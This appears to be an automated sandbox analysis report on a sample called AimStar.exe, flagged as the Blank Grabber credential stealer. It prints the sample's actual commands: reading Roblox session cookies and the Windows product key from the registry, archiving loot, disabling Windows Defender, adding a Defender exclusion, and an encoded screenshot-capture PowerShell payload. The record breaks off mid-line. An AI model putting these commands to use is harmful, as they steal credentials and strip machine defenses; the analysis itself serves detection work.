cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7988 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7396 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7652 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7764 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8064 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 7484 cmdline: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 368 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3116 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7320 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7392 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7768 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7784 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 5652 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7608 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 5700 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7496 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI72842\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2021999995.00000192BB8F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2021999995.00000192BB8F3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: AimStar.exe PID: 7284	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: AimStar.exe PID: 7332	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: AimStar.exe PID: 7332	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AimStar.exe PID: 7332	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\AimStar.exe", ParentImage: C:\Users\user\Desktop\AimStar.exe, ParentProcessId: 7332, ParentProcessName: AimStar.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'", ProcessId: 7392, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\AimStar.exe", ParentImage: C:\Users\user\Desktop\AimStar.exe, ParentProcessId: 7332, ParentProcessName: AimStar.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7400, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\AimStar.exe", ParentImage: C:\Users\user\Desktop\AimStar.exe, ParentProcessId: 7332, ParentProcessName: AimStar.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *", ProcessId: 8064, ProcessName: cmd.exe

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7392, StartAddress: C76632B0, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 7392

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\AimStar.exe, ProcessId: 7332, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 